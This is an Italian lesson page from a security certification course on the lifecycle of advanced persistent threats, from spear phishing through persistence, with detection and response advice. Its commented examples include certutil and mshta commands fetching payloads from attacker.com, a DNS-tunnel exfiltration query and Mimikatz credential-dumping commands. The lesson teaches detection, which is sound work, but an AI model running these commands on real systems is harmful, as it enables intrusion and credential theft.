Ciclo di vita degli APT: dall'accesso iniziale alla persistenza
Segua un APT dall'accesso iniziale tramite spear phishing, passando per la creazione del C2 e l'escalation dei privilegi, fino ai meccanismi di persistenza che sopravvivono ai riavvii e alla reinstallazione delle immagini.
Ciclo di vita degli APT: dall'accesso iniziale alla persistenza è una lezione Cloud & IT Cert Prep gratuita su CoddyKit. Questa è la lezione 1 di 4. Puoi leggere la lezione completa qui gratuitamente — poi esercitati direttamente nel browser con un editor di codice integrato e un tutor IA disponibile 24/7. Fa parte del percorso di apprendimento Cloud & IT Cert Prep, e i tuoi progressi si sincronizzano tra il web e l'app CoddyKit. Il corso Cloud & IT Cert Prep include 4 lezioni in totale.
Che cos’è una Advanced Persistent Threat?
Una Advanced Persistent Threat (APT) è una campagna di attacco informatico sofisticata e di lunga durata, condotta in genere da attori sponsorizzati da Stati nazionali o da gruppi criminali ben finanziati, con obiettivi strategici specifici. Le tre caratteristiche distintive sono: Advanced — utilizza malware personalizzato, vulnerabilità zero-day e tecniche innovative; Persistent — mantiene una presenza occulta per mesi o anni, e non si limita a un’operazione mordi e fuggi; Threat — è un attacco coordinato e mirato contro un’organizzazione specifica. Tra i gruppi APT più noti figurano APT28 (Fancy Bear), associato al GRU russo, APT41, associato alla Cina, e Lazarus Group, associato alla Corea del Nord.
Accesso iniziale: come entrano gli APT
Le campagne APT iniziano in genere con una delle poche tecniche collaudate di accesso iniziale. Lo spear phishing, tramite allegati armati o link per la raccolta delle credenziali, è il metodo più comune: l’e-mail sembra provenire da un collega o da un partner fidato. La compromissione della supply chain (come nel caso di SolarWinds/SUNBURST) inserisce codice dannoso negli aggiornamenti software affidabili. Lo sfruttamento dei servizi esposti su Internet (appliance VPN, server Exchange, applicazioni web) avviene utilizzando CVE non corretti. Gli attacchi watering hole compromettono i siti web visitati frequentemente dai dipendenti dell’organizzazione bersaglio e distribuiscono exploit drive-by ai visitatori.
Esecuzione: avvio del primo payload
Dopo aver ottenuto l’accesso iniziale, l’aggressore deve eseguire il primo payload sul sistema bersaglio. Gli APT prediligono tecniche che si confondono con la normale attività del sistema: macro dannose nei documenti Office, eseguite quando la vittima abilita il contenuto; file HTML Application (HTA), che eseguono script quando vengono aperti; Living-off-the-Land Binaries (LOLBins), ovvero l’uso di strumenti Windows legittimi come mshta.exe, certutil.exe, regsvr32.exe o wscript.exe per eseguire codice dell’aggressore, aggirando gli elenchi di applicazioni consentite. Queste tecniche rendono difficile distinguere i payload iniziali dalla normale attività del sistema.
# Example LOLBin abuse: certutil used to download payload
# certutil.exe -urlcache -split -f http://attacker.com/payload.exe payload.exe
# Example: mshta executing remote HTA
# mshta.exe http://attacker.com/malicious.hta
# Detection: alert on certutil/mshta with network connectionsStabilimento del C2: chiamata a casa
Una volta eseguito il payload iniziale, viene stabilito un canale di Command and Control (C2) verso l’infrastruttura dell’aggressore. Il C2 degli APT moderni utilizza tecniche progettate per eludere il rilevamento: HTTPS verso domini sosia che imitano servizi cloud legittimi (Teams, OneDrive, GitHub); tunneling DNS, che codifica i comandi nelle query dei record DNS TXT, facendole apparire come normale traffico DNS; Domain Generation Algorithms (DGA), che generano ogni giorno un nuovo dominio C2 a partire da un seed, rendendo inefficace il blocco dei domini; e C2 living-off-the-land, che utilizza piattaforme cloud legittime (API di Slack, Google Sheets, Twitter) come canale di comunicazione.
# DNS tunneling detection: look for unusually long DNS queries
# Normal DNS query: www.google.com (13 chars)
# DNS tunnel query: 4f72d3a1b9c2e5f8.exfil.attacker.com (38 chars of encoded data)
# Zeek/Bro detection rule concept:
# alert dns (dns.qname length > 50)Ricognizione: mappatura dell’ambiente
Dopo aver stabilito il C2, gli attori APT conducono una ricognizione interna per comprendere l’ambiente prima di procedere. Questa attività include: l’enumerazione di Active Directory mediante strumenti come BloodHound, per mappare le relazioni di trust e identificare gli obiettivi di maggior valore; la scansione della rete, per individuare host attivi, servizi e porte aperte; la ricerca delle credenziali, analizzando i file system alla ricerca di file di configurazione, database di password o credenziali memorizzate nei browser; e l’enumerazione delle identità, per individuare account privilegiati, account di servizio e workstation degli amministratori. La maggior parte delle attività di ricognizione utilizza strumenti nativi di Windows (net user /domain, ipconfig, nltest) per evitare il rilevamento.
# Native Windows commands used by APTs for discovery
# net user /domain # list domain users
# net group 'Domain Admins' /domain # list domain admins
# ipconfig /all # network configuration
# netstat -ano # active network connections
# tasklist /v # running processesEscalation dei privilegi: ottenimento dei privilegi di amministratore
Gli APT ottengono generalmente l’accesso iniziale con credenziali utente limitate e devono eseguire un’escalation dei privilegi per raggiungere i propri obiettivi. I percorsi di escalation più comuni includono: il furto delle credenziali dalla memoria tramite Mimikatz (estraendo gli hash NTLM dalla memoria del processo LSASS); il Kerberoasting (richiedendo ticket di servizio per gli account di servizio e sottoponendoli a cracking offline); lo sfruttamento di servizi configurati in modo errato con autorizzazioni deboli (percorsi non sicuri dei binari dei servizi, DLL hijacking); e l’impersonificazione dei token, per sottrarre il token di autenticazione di un processo privilegiato. Le tecniche di bypass del Controllo dell’account utente (UAC) consentono di passare da un amministratore standard a SYSTEM senza attivare una richiesta UAC.
# Mimikatz: dump credentials from LSASS memory
# (defender perspective - what attackers run)
# privilege::debug
# sekurlsa::logonpasswords
# Detection: alert on LSASS memory reads by non-system processes
# Windows Event ID 4656/4663: access to LSASS processMeccanismi di persistenza: sopravvivere ai riavvii
Gli APT investono molto nei meccanismi di persistenza che sopravvivono ai riavvii e alla ricreazione delle immagini, perché l’accesso iniziale può essere stato difficile e costoso da ottenere. Tecniche comuni di persistenza in Windows: chiavi Run del Registro di sistema (HKLM\Software\Microsoft\Windows\CurrentVersion\Run); attività pianificate che eseguono malware secondo una pianificazione regolare; servizi Windows ad avvio automatico; sottoscrizioni a eventi WMI (difficili da rilevare e in grado di sopravvivere alla maggior parte delle attività di pulizia); DLL Search Order Hijacking; e impianti Boot/Pre-OS (impianti nel firmware UEFI che sopravvivono alla reinstallazione del sistema operativo, utilizzati da Equation Group e da attori associati alla NSA).
# Common persistence locations to monitor
# Registry:
# HKLM\Software\Microsoft\Windows\CurrentVersion\Run
# HKCU\Software\Microsoft\Windows\CurrentVersion\Run
# HKLM\System\CurrentControlSet\Services
# Check scheduled tasks for suspicious entries
# schtasks /query /fo LIST /v | findstr 'Task Name\|Run As User\|Task To Run'Elusione delle difese: nascondersi in piena vista
Gli APT ricorrono ampiamente all’elusione delle difese per evitare il rilevamento da parte degli strumenti di sicurezza degli endpoint e degli analisti. Le tecniche includono: iniezione di processi — inserire codice malevolo in processi legittimi come explorer.exe o svchost.exe, in modo che il malware venga eseguito con il nome di un processo affidabile; timestomping — modificare i timestamp dei file per far apparire i file malevoli come esistenti da anni; eliminazione e manipolazione dei log — cancellare i registri eventi di Windows per rimuovere le prove; abuso dei certificati di firma del codice — firmare il malware con certificati legittimi rubati; ed esecuzione in memoria (malware fileless), che non scrive mai dati sul disco, dove verrebbe rilevato dagli antivirus basati sui file.
Esfiltrazione: sottrarre dati in modo occulto
Gli APT gestiscono con attenzione l’esfiltrazione dei dati per evitare di attivare i controlli DLP e il rilevamento delle anomalie di banda. Le tecniche includono: preparazione dei dati — raccogliere i dati mirati in un archivio crittografato prima di esfiltrarli in piccoli blocchi nell’arco di diversi giorni; esfiltrazione tramite HTTPS verso servizi di archiviazione cloud (OneDrive, Dropbox) consentiti dalle regole del firewall aziendale; steganografia — nascondere i dati all’interno di file immagine; ed esfiltrazione basata sull’orario durante le ore lavorative, per confondersi con il traffico legittimo. Gli APT esfiltrano solo ciò di cui hanno bisogno (proprietà intellettuale di alto valore, credenziali, piani strategici) invece di copiare tutto indiscriminatamente, riducendo al minimo la propria impronta e la probabilità di rilevamento.
Rilevamento delle attività APT: indicatori chiave
Il rilevamento degli APT richiede di andare oltre i singoli avvisi per identificare schemi di attività correlate lungo l’intera kill chain. Gli indicatori chiave includono: relazioni insolite tra processi padre e figlio (ad esempio, Word che avvia PowerShell); comandi PowerShell codificati o download da Internet; attività pianificate o servizi creati in orari insoliti; accesso alla memoria di LSASS da parte di processi non di sistema; movimento laterale tramite SMB o WMI dalle workstation; e query DNS in uscita insolite con sottodomini molto lunghi. Il MITRE ATT&CK Navigator consente ai difensori di associare le tecniche rilevate alla matrice ATT&CK e di individuare le lacune nella copertura del rilevamento.
# Splunk query: detect PowerShell encoded command execution
# index=windows source=WinEventLog:Security EventCode=4688
# | search NewProcessName='*powershell*' CommandLine='*-enc*'
# | table _time, ComputerName, SubjectUserName, CommandLineRisposta agli APT: contenere la minaccia senza farsi scoprire
La risposta a un APT attivo richiede un attento equilibrio: contenere la minaccia senza allertare l’aggressore. Un contenimento prematuro (bloccare il traffico C2, disabilitare gli account) può indurre l’APT ad attivare payload distruttivi o ad accelerare l’esfiltrazione. Le best practice includono: monitorare in modo occulto mentre si raccolgono informazioni; segmentare gradualmente gli host infetti utilizzando regole del firewall senza bloccare il C2; implementare tecnologie di deception (honeytoken, account canary) per monitorare l’attività dell’aggressore; e coordinarsi con le forze dell’ordine prima di intraprendere importanti azioni di contenimento. Una bonifica completa richiede di identificare tutti i meccanismi di persistenza e gli account compromessi: un solo impianto non individuato è sufficiente perché l’aggressore ritorni.
Verifica rapida
Verifichi la propria comprensione dei concetti di CompTIA Security+ (SY0-701) trattati in questa lezione.
Riepilogo della lezione
In questa lezione ha imparato che: gli APT sono campagne avanzate, persistenti e mirate, che in genere operano per mesi utilizzando spear phishing, attacchi alla supply chain o lo sfruttamento di vulnerabilità per ottenere l’accesso iniziale; gli APT usano LOLBin e servizi cloud legittimi per il C2, così da confondersi con il traffico normale ed eludere il rilevamento; e i meccanismi di persistenza vanno dalle chiavi Run del Registro di sistema agli impianti nel firmware UEFI, con le sottoscrizioni WMI particolarmente difficili da rilevare e correggere. Nella prossima lezione esamineremo le tecniche di movimento laterale, tra cui Pass-the-Hash e Pass-the-Ticket.
Domande Frequenti
La lezione «Ciclo di vita degli APT: dall'accesso iniziale alla persistenza» è gratuita?
Sì — il testo completo di «Ciclo di vita degli APT: dall'accesso iniziale alla persistenza» è gratuito qui sul web. Per esercitarvi in modo interattivo (un editor di codice integrato e un tutor IA 24/7) e sbloccare il resto del corso Cloud & IT Cert Prep, passa a CoddyKit PRO. Il corso Cloud & IT Cert Prep include 4 lezioni in totale.
Cosa imparerò in «Ciclo di vita degli APT: dall'accesso iniziale alla persistenza»?
Segua un APT dall'accesso iniziale tramite spear phishing, passando per la creazione del C2 e l'escalation dei privilegi, fino ai meccanismi di persistenza che sopravvivono ai riavvii e alla reinstal… Eserciti Cloud & IT Cert Prep con codice pratico che esegui direttamente nel browser, e un tutor IA 24/7 risponde alle tue domande mentre lavori sulla lezione.
Ho bisogno di esperienza per iniziare Cloud & IT Cert Prep?
Non è richiesta alcuna esperienza precedente. Cloud & IT Cert Prep su CoddyKit è strutturato per principianti e studenti avanzati, quindi puoi iniziare da qui o dall'inizio e procedere al tuo ritmo. Questa è la lezione 1 di 4.
Quanto tempo richiede la lezione «Ciclo di vita degli APT: dall'accesso iniziale alla persistenza»?
La maggior parte delle lezioni CoddyKit richiede circa 5–10 minuti. Ogni lezione è breve e interattiva, quindi fai progressi costanti e riprendi esattamente da dove hai lasciato su web e app.
Posso scrivere ed eseguire codice in questa lezione Cloud & IT Cert Prep?
Sì. Ogni lezione Cloud & IT Cert Prep include un editor di codice integrato, quindi scrivi ed esegui codice reale direttamente nel tuo browser e ricevi feedback istantaneo dall'IA — nessuna configurazione locale necessaria.
Tutte le lezioni di questo corso
- Ciclo di vita degli APT: dall'accesso iniziale alla persistenza
- Movimento laterale: Pass-the-Hash e Pass-the-Ticket
- Attacchi Kerberoasting e Golden Ticket
- Framework MITRE ATT&CK per rilevamento e risposta